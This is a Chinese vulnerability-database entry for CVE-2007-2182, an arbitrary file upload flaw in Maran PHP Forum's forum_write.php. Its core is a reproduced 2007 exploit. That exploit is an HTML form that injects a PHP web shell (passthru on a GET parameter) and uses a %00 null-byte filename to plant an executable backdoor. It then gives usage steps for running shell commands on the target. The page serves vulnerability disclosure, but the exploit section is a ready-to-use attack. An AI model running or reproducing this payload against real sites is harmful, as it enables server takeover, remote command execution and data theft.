Maran PHP Forum Forum_write.PHP 任意文件上传漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112756 漏洞类型 输入验证
发布时间 2007-04-22 更新时间 2007-04-25
CVE编号 CVE-2007-2182 CNNVD-ID CNNVD-200704-448
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3775
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-448
|漏洞详情
MaranPHPForum的forum_write.php文件中存在未限制文件上传漏洞。远程攻击者可以借助页参数中的文件名里的拖动的%00,上传和运行任意的PHP文件。
|漏洞EXP
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+                                               Y! Underground Group                                               +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Portal......:  Maran PHP Forum                                                                          +
+          Author......:  Dj7xpl / Dj7xpl@Yahoo.com                                                                +
+          Type........:  Remote Code Execution                                                                    +
+          Download....:  http://www.maran.pamil-visions.com/maranforum.php                                        +
+          Page........:  http://Dj7xpl.2600.ir                                                                    +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Xpl.........:                                                                                           +
+  <html><head><Title>---===Maran PHP Forum===------===Dj7xpl===---</title></head>                                 +
+  <body bgcolor="red">                                                                                            +
+  <center>                                                                                                        +
+  <form name="AimStats" method="post" action="http://site.com/path to site/forum_write.php">                      +
+  <input name="name" value="<?passthru($_GET[cmd])?>" type="text" >                                               +
+  <input name="page" value="pagename.php%00" type="text" >                                                        +
+  <input type="submit" name="Submit" value="Submit" >                                                             +
+  </form><br><br>                                                                                                 +
+  <font color="#C0FF3E" size="+1"> Please change Target And Run This Script</font><br>                            +
+  <font color="#C0FF3E" size="+1"> Backdoor : http://[Target]/[Path]/data/pagename.php?cmd=shell</font></br>      +
+  <font color="#C0FF3E" size="+1"> E.g  :  http://site.com/forum/data/filename.php?cmd=ls -la</font>              +
+  </center>                                                                                                       +
+  </body>                                                                                                         +
+  </html>                                                                                                         +
+                                                                                                                  +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2007-04-22]
|参考资料

来源:MILW0RM
名称:3775
链接:http://www.milw0rm.com/exploits/3775
来源:XF
名称:maranforum-pagename-code-execution(33802)
链接:http://xforce.iss.net/xforce/xfdb/33802
来源:BID
名称:23614
链接:http://www.securityfocus.com/bid/23614
来源:VUPEN
名称:ADV-2007-1493
链接:http://www.frsirt.com/english/advisories/2007/1493
来源:SECUNIA
名称:24968
链接:http://secunia.com/advisories/24968